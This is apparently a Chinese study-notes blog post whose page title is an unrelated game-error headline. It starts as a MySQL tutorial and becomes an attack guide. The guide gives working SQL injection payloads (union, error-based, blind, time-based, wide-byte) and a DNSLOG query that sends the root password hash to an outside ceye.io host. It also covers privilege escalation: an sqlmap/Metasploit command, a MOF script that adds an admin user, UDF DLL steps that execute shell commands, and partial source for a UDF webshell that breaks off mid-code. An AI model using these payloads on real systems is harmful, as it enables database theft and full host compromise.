英雄联盟错误码7801105（英雄联盟错误码7801307的解决方法） - 原点资讯

MySQL小结

发表于 2020-09-21 分类于知识整理阅读次数：
本文字数： 67k 阅读时长 ≈ 1:01

Web程序代码中对于用户提交的参数未做过滤就直接放到SQL语句中执行,导致参数中的特殊字符打破了SQL语句原有逻辑,黑客可以利用该漏洞执行任意SQL语句。

MySQL安装及配置Mysql安装（这里版本为8.0.17）

第一步：下载Mysql

地址：https://dev.mysql.com/downloads/mysql/

第二步：配置Mysql环境变量

将下载的mysql文件夹bin目录加入环境变量，D:\mySQL\bin

第三步：安装mysql

首先执行mysqld --initialize-insecure(自动生成无密码root用户)，然后以管理员的权限执行CMD：mysqld install，即可完成安装。

第四步：启动/停止mysql

net start mysql
net stop mysql

登陆MySQL及配置密码

登陆MySQL(这里创建的是无密码root)

mysql -u root -p，提示输入密码时候无需输入，回车即可。

更改Mysql密码

ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY 'RootPwd@123456';
flush privileges;

开启mysql远程

查看是否支持远程： select host ,user from user;

第一种：update user set host ='%' where user='root';
第二种：grant all privileges on *.* to 'root'@'%' identIFied by '123456' with grant option;

MySQL命令学习

有关查看数据库相关信息的命令：

select @@version查看当前MySQL版本
select user(); / select system_user();/select session_user();查看当前用户
select database();查看当前数据库
select connection_id();返回当前客户的连接ID
select now()查看系统当前时间
select @@basedir；查看Mysql的安装路径
select @@datadir;查看数据库安装路径
show databases;查看当前MySQL所有库名
mysqldump -u root -p --default-character-set=UTF8 [database] [table] > dump.txtMysql导出位.txt
mysql -u root -p --default-character-set=UTF8 database_name < dump.txt导入

一些命令

use <database_name>使用某个数据库，需指定库名
show tables;查看当前数据库的数据库表
select * from users; 查询users表中所有的数据
select first_name from users;查询users表中first_name字段的所有内容
select concat(user,0x3C,password) from users; concat连接字符串函数
select group_concat(user,0x3C,password) from users;将user,password字段所有内容连接成一个字符串

实践：

select * from users limit m,n;查询user表中数据，输出第m(代表下标，下标都是从0开始)条开始的n条数据
select concat(user,0x3c,password) from users limit 3,2;将users表中user、password字段第四、五条数据用<号连接，输出

一些高级命令

select mid(user(),2,3);mid字符串截取，截取当前用户名第二个字符开始的三个字符
select substr(user(),2,3);subsets字符串截取，截取当前用户名第二个字符开始的三个字符
select ord(mid(database(),3,1));/select ord(substr(database(),3,1));查询当前库名的第三个字符的ASCII
select ascii('s');查询s的ASCII值，同ord
select char(97);将ASCII值转为字符串
select count(*) from users;查询users表中数据条数
select length(user());查询当前用户名长度
select sleep(2);延时两秒返回数据
select * from users order by user;根据字段名排序(拓展：order by 8执行正常，order by 9报错，证明字段个数只有八个)
select password from users where user_id=2 or user_id=3;查询users表中user_id为2和3的password字段的值

增删改查

增加一条数据

需要匹配users表中字段个数，如果字段不匹配会报错；如果字段内容限定为not NUll，字段为空时也报错。

insert into users values('9','test','test','test123','ssss','lujing','2019','2020');

修改数据

update users set user='ccc' where password='ssss';将password为ssss的那条数据的user字段内容更新为ccc；多条数据用逗号隔开 set user='ccc',user_id='20'

删除数据

delete from users where user_id=9;删除users表中user_id为9的那条数据
drop table users;删除users表
drop database dvwa;删除dvwa库

Mysql数据去重

(找了半天，只能将查询结果导入到另外一张表中了。。。)

利用distinct进结果去重，然后将查询的结果导入到另外一张表中。

insert ignore into user_info select distinct name,sex,id_card,tel,address,mail from users_room;

SQL注入可能用到的语法

基础：

基于and/or判断注入点

首先判断页面正常返回。

然后select user,password from users where user_id=2 and 1=1;正确执行(and两边表达式均成立，返回为真)页面正常返回

select user,password from users where user_id=2 and 1=2;返回为空(and两边表达式一真一假，返回为假)页面返回错误或者不正常

即可证明SQL存在

OR同理—>

select user,password from users where user_id=2 or 1=1;返回所有user和password的内容(or两边表达式都为真且1=1恒成立，则返回所有)

select user,password from users where user_id=2 or 1=2;仅返回一条数据(1=2不成立,因此只返回user_id=2的那条数据指定的内容)

注意：and 1=1 并非绝对，只要是表达式，类似于’s’=’s’等等，，，，
判断SQL注入存在，需要三个页面对比才行。

注入点的多种情况

select user, password from users where user_id='2';如果源于句，使用了引号将ID值扩起来，需要构造如下：where user_id='2' and '1'='1,也即是2' and '1'='1，2' and '1'='2

同理，如果使用双引号，括号扩起来的，也需要按照上面的情况。(如果where user_id=('1')这样呢？)

试一试：2',2''?

SQL注入的原理

就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。

高级查询语法

查询结果排序

select * from users order by last_name;查询users表中的所有数据，并使用last_name字段内容排序(根据的是ASXCII码)

可以利用select * from users order by N;判断users表字段个数，N小于等于字段数正常返回数据，大于则报错。
-- -,#在数据库中表示注释之后的内容,/**/表示多行注释,注释掉扩起来的内容
select * from users order by last_name#asdasdas;
select * from users order by last_name-- -asadasdas;
多行注释也可以用于行内：select * from users/**/order/*ssssss*/by last_name;

其他几个排序：

降序排列查询结果：select * from users DESC;

升序(默认排序):select * from users ASC;

组合查询

一个查询中从不同的表返回结果数据
在一个表中执行多个查询，按一个查询返回数据

select user, password from users where user_id='2' union select last_name, first_name from users where user_id='4'

查询user_id=2的use,password字段内容，查询user_id=4的last_name,first_name字段的值，一起返回(也即是同时返回。。。)

模糊查询

关键词like，通配符%,*,.等，常用的正则规则字符。

select * from users where avatar like '%hac%'匹配users表中avatar字段中含有hac的内容

“*“表示匹配零个或多个在它前面的东西。例如，”D*“匹配任何数量的”D”字符

“.“ 匹配任何单个的字符。

当使用正则匹配时，使用REGEXP和NOT REGEXP操作符（或RLIKE和NOT RLIKE，功能是一样的）

模糊查询中的注入：

select * from users where avatar like '%hac%' union select password from users;首先查询avatar字段中包含hac的数据，然后查询users表中的password字段内容，然后组合起来返回(会去重)

一些事项：

select user_id from users union select password from users;正常执行(组合查询时候，前后查询的字段数要一样，这样就是错误的：select user_id from users union select password,user from users;)

SQL注入示例

题目：where user_id=2处存在注入点，要求判断注入点并查询到user,password字段内容。

源于句：select user_id from users where user_id=2;

解：

select user_id from users where user_id=2 and 1=1-- -;正常
select user_id from users where user_id=2 and 1=2-- -;不正常，结合起来判断存在注入点
select user_id from users where user_id=2 order by 1-- -;正常
select user_id from users where user_id=2 order by 2-- -错误，证明只有一个字段(在使用的user_id)
select user_id from users where user_id=2 union select 1-- - 1为占位符，填充使用
select user_id from users where user_id=2 union select database()-- -替换占位符，可以查询一些常用信息(版本，数据库名，用户名，路径等)
select user_id from users where user_id=2 union select concat(user,0x3c,password) from users-- -(使用concat连接user,password一起输出，就不用连续使用union select)

Mysql系统表利用infomation_schema说明

MySQL中，把 information_schema 看作是一个数据库，确切说是信息数据库。其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名，数据库的表，表栏的数据类型与访问权限等。在INFORMATION_SCHEMA中，有数个只读表。它们实际上是视图，而不是基本表，因此，你将无法看到与之相关的任何文件。

information_schema数据库表说明:

SCHEMATA表：提供了当前mysql实例中所有数据库的信息。是show databases的结果取之此表。
TABLES表：提供了关于数据库中的表的信息（包括视图）。详细表述了某个表属于哪个schema，表类型，表引擎，创建时间等信息。是show tables from schemaname的结果取之此表。
COLUMNS表：提供了表中的列信息。详细表述了某张表的所有列以及每个列的信息。是show columns from schemaname.tablename的结果取之此表。
STATISTICS表：提供了关于表索引的信息。是show index from schemaname.tablename的结果取之此表。
USER_PRIVILEGES（用户权限）表：给出了关于全程权限的信息。该信息源自mysql.user授权表。是非标准表。
SCHEMA_PRIVILEGES（方案权限）表：给出了关于方案（数据库）权限的信息。该信息来自mysql.db授权表。是非标准表。
TABLE_PRIVILEGES（表权限）表：给出了关于表权限的信息。该信息源自mysql.tables_priv授权表。是非标准表。
COLUMN_PRIVILEGES（列权限）表：给出了关于列权限的信息。该信息源自mysql.columns_priv授权表。是非标准表。
CHARACTER_SETS（字符集）表：提供了mysql实例可用字符集的信息。是SHOW CHARACTER SET结果集取之此表。
COLLATIONS表：提供了关于各字符集的对照信息。
COLLATION_CHARACTER_SET_APPLICABILITY表：指明了可用于校对的字符集。这些列等效于SHOW COLLATION的前两个显示字段。
TABLE_CONSTRAINTS表：描述了存在约束的表。以及表的约束类型。
KEY_COLUMN_USAGE表：描述了具有约束的键列。
ROUTINES表：提供了关于存储子程序（存储程序和函数）的信息。此时，ROUTINES表不包含自定义函数（UDF）。名为“mysql.proc name”的列指明了对应于INFORMATION_SCHEMA.ROUTINES表的mysql.proc表列。
VIEWS表：给出了关于数据库中的视图的信息。需要有show views权限，否则无法查看视图信息。
TRIGGERS表：提供了关于触发程序的信息。必须有super权限才能查看该表

https://blog.csdn.net/demonson/article/details/80388677（MySQL information_schema 详解）

information_schema使用示例

获取表名

`1`	`select 1,table_name from information_schema.tables where table_schema=(数据库名十六进制) limit 2,1-- - # 当前数据库所有表，使用limit n,1 逐条输出。`

判断表的数量

`1`	`(select count(table_name) from information_schema.tables where table_schema =database())=2-- - # 判断表的数量为2`

获取字段名

`1`	`select 1,column_name from information_schema.columns where table_name=0x7573657273 limit 1,1-- -`

`1`	`length((select column_name from information_schema.columns where table_name=(select table_name from information_schema.tables where table_schema =database() limit 0,1)limit 0,1)=10-- -`

组合语句

`1`	`length((select column_name from information_schema.columns where table_name=(select table_name from information_schema.tables where table_schema =database() limit 0,1)limit 0,1))=10-- -`

MySQL注入基础常用系统函数

1 2 3 4 5 6 7 8 9 10 11

示例：select database();查询当前数据库名称 ➢ 1.system_user() 系统用户名 ➢ 2.user() 用户名 ➢ 3.current_user() 当前用户名 ➢ 4.session_user() 链接数据库的用户名 ➢ 5.database() 数据库库名 ➢ 6.version() mysql 数据库版本信息 ➢ 7.load_file() 转换成16 或10 进制读取本地文件 ➢ 8.@@datadir 读取数据库路径 ➢ 9.@@basedir MYSQL 安装路径 ➢ 10.@@version_compile_os

常用关键字/函数

1 2 3 4 5 6 7 8 9

limit m,n # 从m开始检索n条数据 select mid(database(),2,1) # 用于得到当前数据库名的第二个字符 select ord(mid(user(),1,1))= 114 # ord函数返回字符串第一个字符的 ASCII 值。 select concat(1,0x3c,2) # 将字符串1和2用<连接起来输出为：1<2 select sleep(2) # 结果在两秒钟后返回，可理解为暂停2秒 select length(user()) # 当前用户名长度 length() 长度函数 select substr(user(),2,1) # 从第二个字符开始截取一个字符长度,这里为o IF(expr1,expr2,expr3) # expr1 是TRUE则IF()的返回值为expr2; 否则返回值则为 expr3 select count(user) from users # 查询users表中user字段所有数据的个数

系统表简介

Information_schema数据库是MySQL自带的，它提供了访问数据库元数据的方式。什么是元数据呢？元数据是关于数据的数据，如数据库名或表名，列的数据类型，或访问权限等。有些时候用于表述该信息的其他术语包括“数据词典”和“系统目录”。
该库有多个表其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名，数据库的表，表栏的数据类型与访问权限等。

更多介绍：https://blog.csdn.net/Touatou/article/details/80775601

显性注入

经过在线DVWA http://43.247.91.228:81测试(介绍基础，所以选择Low级别)，在线的级别调不好，请本地搭建。

源码：

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28

<?php if(isset($_GET['Submit'])){ // Retrieve data $id = $_GET['id']; $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'"; $result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' ); $num = mysql_numrows($result); $i = 0; while ($i < $num) { $first = mysql_result($result,$i,"first_name"); $last = mysql_result($result,$i,"last_name"); echo '<pre>'; echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last; echo '</pre>'; $i ; } } ?>

重点看源码中：SELECT first_name, last_name FROM users WHERE user_id = '$id'

漏洞产生原因：SQL语句未经过处理，直接将传入的$id当做参数执行。(这里不进行 or 1=1之类的测试)

构造语句进行解释：user_id='$id',如果传入的$id值为1' order by 5-- -，源语句变成了：

user_id='1’ order by 5-- -'，在数据库中是可以正常执行的。
当num为2时，也就是user_id='1’ order by 2-- -正常执行，为3时报错，说明当前库的users表有两个字段。

开始注入

这里数据库版本大于5.0，测试的是字符型，因此是 ‘ and ‘1’=’1’，省略 1’
这里并非直接获取密码啊，什么的，仅仅展示可能用到了的语句。

开始注入之前，获取有用信息：

1 2 3 4 5 6 7 8

order by 2-- - # 获取当前数据库，所使用表的字段长度，-- - 表示注释之后的内容 and '1'='1' union select 1,2-- - # 匹配字段 and '1'='2' union select 1,2-- - # 爆字段位置，也即是可用字段，这里都可以 # 这时候就可以使用mysql系统函数来测试。 and '1'='1' union select 1,ord(mid(user(),1,1))=114-- -# 正常返回证明当前数据库用户为r开头一般为root. and '1'='1' union select 1,ord(mid(user(),2,1))=111-- -# 正常返回证明当前数据库用户第二个字符为o ...

获取数据库表名：

1 2 3 4 5

获取表名源语句： and '1'='1' union select 1,table_name from information_schema.tables where table_schema=(数据库名十六进制) limit 2,1-- - # 当前数据库所有表，使用limit n,1 逐条输出。注入语句： and '1'='1' union select 1,table_name from information_schema.tables where table_schema=0x64767761 limit 2,1-- -

获取字段名

1 2

原理同获取表名。 and '1'='1' union select 1,column_name from information_schema.columns where table_name=0x7573657273 limit 1,1-- -

获取字段内容

1 2 3 4 5 6 7 8 9 10

# 已经爆出表名和字段名，直接查询即可 and '1'='1' union select user,password from users-- - # 上语句有两个可用注入字段，如果只有一个呢？ # 第一种方式，挨个爆，先爆名字，再爆密码 and '1'='1' union select 1,user from users-- - # 第二种方式，使用concat函数将字符串连接起来 and '1'='1' union select 1,concat(user,0x3c,password) from users-- - # `0x3c`为`<`,这里将user、password用`<`连接起来。输出格式为：pablo<0d107d09f5bbe40cade3de5c71e9e9b7

至此，已经爆出数据库中可用的账号密码，非root。类似于XXX系统的用户/管理员账号密码。脱裤子的话请绕行- -

MySQL函数报错Floor

当使用 floor，rand，group by 连用时候会报错。利用报错，使用concat连接，可以实现注入。

1 2 3 4 5 6 7 8 9 10 11 12

select concat(floor(rand(0)*2), '===='),count(1) from users group by user_id; 输出： ---------------------------------- ---------- | concat(floor(rand(0)*2), '====') | count(1) | ---------------------------------- ---------- | 0==== | 1 | | 1==== | 1 | | 1==== | 1 | | 0==== | 1 | | 1==== | 1 |

1 2 3 4 5 6 7 8 9 10 11 12 13

select concat(floor(rand(0)*2), '====',(select user())),count(1) from users group by user_id; 输出： -------------------------------------------------- ---------- | concat(floor(rand(0)*2), '====',(select user())) | count(1) | -------------------------------------------------- ---------- | 0====root@localhost | 1 | | 1====root@localhost | 1 | | 1====root@localhost | 1 | | 0====root@localhost | 1 | | 1====root@localhost | 1 | -------------------------------------------------- ----------

updatexml

1 2

updatexml() //5.1.5 and 1=(updatexml(1,concat(0x3a,(select user())),1))

1 2 3 4 5

select * from users where user_id=1 and 1=(updatexml(1,concat(0x3a,(select database())),1)); 报错： ERROR 1105 (HY000): XPATH syntax error: ':dvwa'

1 2 3 4 5

select * from users where user_id=1 and 1=(updatexml(1,concat(0x3a,(select user())),1)); 报错： ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'

extractvalue

1 2 3 4 5 6

extractvalue() //5.1.5 and extractvalue(1,concat(0x5c,(select user()))) select * from users where user_id=1 and extractvalue(1,concat(0x3a,(select database()))); ERROR 1105 (HY000): XPATH syntax error: ':dvwa'

exp

1 2 3

exp() //5.5.5版本之后可以使用 select host from user where user = 'root' and Exp(~(select * from (select version())a));

name_const

1 2 3

name_const //支持老版本 select * from (select NAME_CONST(version(),0),NAME_CONST(version(),0))x;

几何函数

1 2 3

geometrycollection(),multipoint(),polygon(),multipolygon(),linestring(),multilinestring() select multipoint((select * from (select * from (select * from (select version())a)b)c));

宽字节

参考：

https://xz.aliyun.com/t/3992#toc-3

MYSQL client链接编码的锅

`1`	`show variables like '%character%'`

由于编码不一致，导致的问题，主要是汉字占用了3个字节。关键字?，当客户端连接编码设置为GBK的时候与php进行交互的时候就会出现字符转换导致单引号逃逸的问题。
测试payload: index.php?id=?'

MYSQL iconv函数 mb_convert_encoding函数的锅
借用先知: $id =iconv('GBK','UTF-8', $id)
?'===(addslashes)===>?\'===(iconv)===>?\\'
其实就是 utf8 -> gbk ->utf-8 低位的\ 也就是反斜杠干掉了转义单引号的反斜杠。

Big5编码导致的宽字节注入

猜测代码: iconv('utf-8','BIG5',$_GET['id'])
payload构造同上: 功’ -> addsalshes -> 功' -> iconv -> ?\\'->¥' 逃逸单引号
豹'

SQL盲注

这里包含了Bool和Time类型

开始注入

本地搭建的DVWA，在线的显性注入出了点问题，就本地搭建了。
这里测试使用了=号，为了直观，真实环境协同使用<、>快速判断
仔细观察通过长度和返回时间两种方式，下文对时间的不过多说了

判断数据库名长度

1 2 3 4 5

# 第一种，通过长度 and length(database())=4-- - # 正常返回说明当前用户名长度为 14 ，我这里是：root@localhost # 第二种通过返回时间判断，如果网络较差，建议多设置几秒。 and if(length(database())=4,sleep(5),1)-- - # 如果数据库名长度为4则延时5秒返回结果

判断数据库名称

1 2 3 4 5 6

# 只能挨个字符判断,这里值猜不到数据库名的情况下，挨个字符判断 # 第一种，通过ASCII值判断，判断正确返回正常页面， and ascii(substr(database(),1,1))=100-- - # 第1个字符开始，1为截取字符长度 # 第二种，通过返回时间 and if(ascii(substr(database(),1,1))=100,sleep(3),1)-- -

判断数据库表名

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17

# 猜表的数量，因为不知道数据库结构，只能慢慢猜，这个根据自己需求，非必须 and (select count(table_name) from information_schema.tables where table_schema =database())=2-- - # 判断表的数量为2 # 基于返回时间 and if((select count(table_name) from information_schema.tables where table_schema =database())=2, sleep(3),1)-- - # 猜表名的长度,这里注意是length((exp1))=9,用括号将查询内容括起来 and length((select table_name from information_schema.tables where table_schema =database() limit 0,1))=9-- - # 通过limit 1,1遍历表名长度， limit n,1 n从0开始，0表示第一个表 # 基于时间的不在写了。 # 猜第一个表的第一个字母，这里substr((exp1),1,1)=103,用括号将查询内容括起来 and ascii(substr((select table_name from information_schema.tables where table_schema =database() limit 0,1),1,1))=103-- - # 上语句简析：ascii( substr(exp1,1,1) )=103 # exp1 = select table_name from information_schema.tables where table_schema =database() limit 0,1 # 基于时间的不再写了。

通过limit控制查询的表，通过substr截取表名字符串，挨个判断值

判断字段名

原理和判断表名一样

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16

# 首先来个嵌套的，这里不用获取表名，可以直接得到字段长度、值。 # 这里获取的是第一个表的第一个字段的长度 # 通过第二个limit来控制查询字段。 and length((select column_name from information_schema.columns where table_name=(select table_name from information_schema.tables where table_schema =database() limit 0,1)limit 0,1))=10-- - # 第二种，根据前面的表名，使用如下语句，十六进制数据为：表名的十六进制。 and length((select column_name from information_schema.columns where table_name=0x6775657374626F6F6B limit 0,1))=10-- - # 基于时间的就不再写了。也就是 if(length()=2,sleep(2),1)这种 # 求值第一个表的第一个字段的第一个字母 and ascii(substr((select column_name from information_schema.columns where table_name=0x6775657374626F6F6B limit 0,1),1,1))=99-- - # 嵌套求第一个表的第一个字段的第一个字母 and ascii(substr((select column_name from information_schema.columns where table_name=(select table_name from information_schema.tables where table_schema =database() limit 0,1)limit 0,1),1,1))=99-- -

判断字段内容

1 2 3 4 5 6 7

# 其实有了表名和字段名，可以直接查询的。先获取长度再获取值。 and length((select comment_id from guestbook))=1-- - # 获取值 and ascii(substr((select comment_id from guestbook),1,1))=49-- - # 基于时间的 and if(ascii(substr((select comment_id from guestbook),1,1))=49,sleep(3),1)-- -

到此，盲注的基本方法已经完成

DNSLOG

有时候注入发现并没有回显，也不能利用时间盲注，那么就可以利用带外通道，也就是利用其他协议或者渠道，如http请求、DNS解析、SMB服务等将数据带出。

1 2 3 4

SELECT LOAD_FILE(CONCAT('\\\\',( SELECT DATABASE() ),'.xx.xx\\x)); # ceye SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.xxx.ceye.io\\abc'));

条件：

mysql.ini 中 secure_file_priv 必须为空

mysql 新版本下secure-file-priv字段： secure-file-priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的。

1 2 3 4 5

当secure_file_priv的值为null ，表示限制mysqld 不允许导入|导出当secure_file_priv的值为/tmp/ ，表示限制mysqld 的导入|导出只能发生在/tmp/目录下当secure_file_priv的值没有具体值时，表示不对mysqld 的导入|导出做限制

从payload看出load_file的路径是windows下的UNC路径，所以mysql带外注入只能发生在windows机器上

MySQL提权SQLMap MSF

已知用户名密码情况下，利用Sqlmap结合MSF进行提权。(需要对目录有写权限)

`1`	`sqlmap -d mysql://admin:123456@10.52.95.209:3306/mysql --os-pwn --msf-path /opt/metasploit-framework/`

MOF提权

简介：mof是windows系统的一个文件（在c:/windows/system32/wbem/mof/nullevt.mof）叫做”托管对象格式”其作用是每隔五秒就会去监控进程创建和死亡。其就是用又了mysql的root权限了以后，然后使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行，这个mof当中有一段是vbs脚本，这个vbs大多数的是cmd的添加管理员用户的命令。

必备命令

所需要的SQL语句select load_file('D:\wamp\xishaonian.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';

必备脚本

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25

# pragma namespace("\\\\.\\root\\subscription") instance of __EventFilter as $EventFilter { EventNamespace = "Root\\Cimv2"; Name = "filtP2"; Query = "Select * From __InstanceModificationEvent " "Where TargetInstance Isa \"Win32_LocalTime\" " "And TargetInstance.Second = 5"; QueryLanguage = "WQL"; }; instance of ActiveScriptEventConsumer as $Consumer { Name = "consPCSV2"; ScriptingEngine = "JScript"; ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")"; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };

UDF提权

这里的前提是已经上传了udf.dll,如果没有写入权限，emmm,,,我不肥了。。

注意事项：

mysql<5.2版本的将.dll文件导入到c:\windows 或者c:\windows\system32 目录下。
mysql>5.2版本的将.dll文件导入到/MySQL/lib/plugin/ mysql安装目录下。
如果报错内容为：The MySQL server is running with the --secure-file-priv option so it cannot execute this statemen请在MySQL配置文件my.ini文件的[mysqld]选项内加入secure_file_priv =然后重启mysql服务。。
如果报错--secure-file-priv 又无法修改my.ini，则没有办法。

详情参考：--secure-file-priv 特性

手动UDF提权制作udf.dll

SQLMAP下路径：

1 2 3 4 5

/usr/local/Cellar/sqlmap/1.4.3/libexec/data/udf/mysql/windows/64 /usr/local/Cellar/sqlmap/1.4.3/libexec/extra/cloak python2 cloak.py -d -i lib_mysqludf_sys.dll_ # 即可在当前目录下生成 lib_mysqludf_sys.dll

利用 1

查看plugin目录show variables like '%plugin%';

提示：由于MySQL>5.2版本后，在其安装目录的lib目录下没有 plugin 目录，所以，我们得新建这个目录，并且将我们的 udf.dll 文件放入 plugin目录下，我们执行下面命令，使用NTFS ADS流创建 plugin

`1`	`select 'xxxxxx' into dumpfile 'C:\\Program\ Files\\MySQL\\MySQL\ Server\ 5.4\\lib\\plugin::$INDEX_ALLOCATION'`

导出UDF(也即是将之前生成的lib_mysqludf_sys.dll上传到目标文件夹)
创建函数：CREATE FUNCTION shell RETURNS STRING SONAME 'lib_mysqludf_sys.dll'

注意：如果创建函数时报错，请根据lib_mysqludf_sys.dll中的函数创建。

利用2

利用交互式的SHELL，mysql -uroot -pxxx无法继续交互，需要参数e解决这个问题。

1 2 3 4 5 6

mysql -uroot -pxxxxxxxx mysql -e "create table a (cmd LONGBLOB);" mysql -uroot -pxxxxxxxx mysql -e "insert into a (cmd) values (hex(load_file('C:\\xxxx\\xxxx.dll')));" mysql -uroot -pxxxxxxxx mysql -e "SELECT unhex(cmd) FROM a INTO DUMPFILE 'c:\\windows\\system32\\xxxx.dll';" mysql -uroot -pxxxxxxxx mysql -e "CREATE FUNCTION shell RETURNS STRING SONAME 'udf.dll'" mysql -uroot -pxxxxxxxx mysql -e "select shell('cmd','C:\\xxxx\\xxx\\xxxxx.exe');"

如没有指定database，将会出现错误，而使用UNION，将不会有回显，一定出现问
题，将会很难定位，故选择以mysql.x的方式指定。

1 2 3 4 5 6 7

mysql -uroot -pXXXXXX -e "create table mysql.a (cmd LONGBLOB);" mysql -uroot -pXXXXXX -e "insert into mysql.a (cmd) values (hex(load_file('D:\\XXXXXXXXXX\\mysql5\\lib\\plugin\\u.dll')));" mysql -uroot -pXXXXXX -e "SELECT unhex(cmd) FROM mysql.a INTO DUMPFILE 'D:/XXXXXXXXXX/mysql5/lib/plugin/uu.dll';" mysql -uroot -pXXXXXX -e "CREATE FUNCTION shell RETURNS STRING SONAME 'uu.dll'" mysql -uroot -pXXXXXX -e "select shell('cmd','whoami');"

UDF提权大马

可以使用T00ls udf.php

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298

<?php //t00ls................... session_start();?> <html> <head> <title>T00ls UDF.PHP</title> <style type="text/css"> input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;} </style> <script type="text/javascript"> function outfile(){ document.getElementById("sql2").value= unescape("select '' into outfile 'd:\\ninty.php'"); } function loadfile(){ document.getElementById("sql2").value = unescape("select load_file('c:\\boot.ini')"); } </script> </head> <body> <?php error_reporting(0); if (isset($_REQUEST['action'])) $action = $_REQUEST['action']; else $action = 'vConn'; switch ($action) { case 'vConn': vConn(); break; case 'conn': conn(); break; case 'exec': execsql(); break; case 'install': install(); break; case 'copy': cp(); break; case 'cplug': cplug(); break; case 'logout': logout(); break; case 'func': func(); break; } function vConn() { echo 'by ninty http://www.t00ls.net/<form action="" method="post"><table><input type="hidden" name="action" value="conn"> <tr><td>ip:</td><td><input type="text" name="host" value="localhost"></td></tr><tr><td>uid:</td><td><input type="text" value="root" name="uid"></td></tr><tr><td>pwd:</td><td><input type="text" name="pwd"></td></tr><tr><td>db:</td><td><input type="text" name="db" value="mysql"></td></tr><tr><td><input type="submit"/></td><td> </td></tr></table></form>'; } function func(){ $conn = conn(false); mysql_select_db('mysql',$conn); mysql_query('CREATE TABLE `func` ( `name` char(64) collate utf8_bin NOT NULL default \'\', `ret` tinyint(1) NOT NULL default \'0\', `dl` char(128) collate utf8_bin NOT NULL default \'\', `type` enum(\'function\',\'aggregate\') character set utf8 NOT NULL, PRIMARY KEY (`name`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_bin COMMENT=\'User defined functions\''); if (mysql_errno($conn) != 0) { echo mysql_error() . '<br/>'; } echo 'Create mysql.func success !'; mysql_close($conn); } function conn($close = true) { if (isset($_SESSION['host'])) { $host = $_SESSION['host']; $uid = $_SESSION['uid']; $pwd = $_SESSION['pwd']; $db = $_SESSION['db']; } else { $host = $_POST['host']; $uid = $_POST['uid']; $pwd = $_POST['pwd']; $db = $_POST['db']; } $conn = mysql_connect($host,$uid,$pwd); if (!$conn) { echo mysql_error().'<br/>'; vConn(); exit(); } mysql_select_db($db,$conn); if (mysql_errno($conn) != 0) { echo mysql_error().'<br/>'; vConn(); exit(); } $_SESSION['host'] = $host; $_SESSION['uid'] = $uid; $_SESSION['pwd'] = $pwd; $_SESSION['db'] = $db; //mysql_query('set names utf8'); showM($conn,$close); return $conn; } function logout(){ unset($_SESSION['host']); unset($_SESSION['uid']); unset($_SESSION['pwd']); unset($_SESSION['db']); unset($_SESSION['notsame']); unset($_SESSION['over51']); unset($_SESSION['plugindir']); $url = $_SERVER['PHP_SELF']; $filename = end(explode('/',$url)); echo '<script>location.href = "'.$filename.'?rn=" Math.random()</script>'; } function showM(&$conn,$close = true){ echo '<center><b>t00ls UDF.PHP</b></center>'; echo '<form action="" method="post"><input type="hidden" name="action" value="logout"><input type="submit" value="Logout"></form>'; echo '<div style="border:solid 1px #333;background-color:#999;padding:4px">'; $sql = 'select concat(\'<b>user()</b>:\',user()) as m union select concat(\'<b>database():</b>\',database()) union select concat(\'<b>datadir</b>:\',@@datadir) union select concat(\'<b>basedir</b>:\',@@basedir) union select concat(\'<b>version()</b>:\',version()) ;'; $meta = mysql_query($sql,$conn); $tmp = 1; while ($row = mysql_fetch_array($meta,MYSQL_ASSOC)) { echo $row['m']; if ($tmp == 1) { $tmp = 2; $h = substr($row['m'],strpos($row['m'],'@') 1); if ($h != 'localhost') { echo ' <b><i><font color=green>[web and db is not the same server.]</font></i></b>'; $_SESSION['notsame'] = 'true'; } } echo '<br/>'; } echo '<b>plugin_dir</b>:'; $meta = mysql_query('show variables like "plugin_dir"'); if (mysql_num_rows($meta)==0) { echo '<font color=white>mysql is under 5.1 , '; if (!isset($_SESSION['notsame'])) echo ' u can dump udf.dll to any directory in follow paths'; echo '</font>'; } else { //over 5.1 $_SESSION['over51'] = 